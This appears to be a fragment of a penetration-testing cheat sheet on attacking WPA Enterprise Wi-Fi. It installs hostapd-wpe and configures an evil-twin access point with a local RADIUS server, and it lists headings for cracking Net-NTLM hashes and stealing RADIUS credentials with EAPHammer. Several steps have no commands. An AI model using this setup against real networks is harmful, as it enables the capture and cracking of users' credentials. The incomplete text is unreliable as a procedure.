Enterprise
Wi-Fi Protected Access Enterprise
hostapd-wpe
1. Install dependencies:
$ sudo apt install libnl-3-dev libssl-dev
$ sudo apt install hostapd-wpe2. Install and configure hostapd-wpe:
$ sudo vi /etc/hostapd-wpe/hostapd-wpe.conf
...
interface=wlan1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ssid=NotEvilTwinAP
channel=1
hw_mode=b
auth_server_addr=127.0.0.1
auth_server_port=18120
auth_server_shared_secret=S3cr3t!
wpa_pairwise=TKIP CCMP3. Run fake AP with RADIUS server:
4. Crack Net-NTLM hashes (mask example):
apd_launchpad
EAPHammer
Setup:
Create a certificate:
Steal RADIUS creds:
Last updated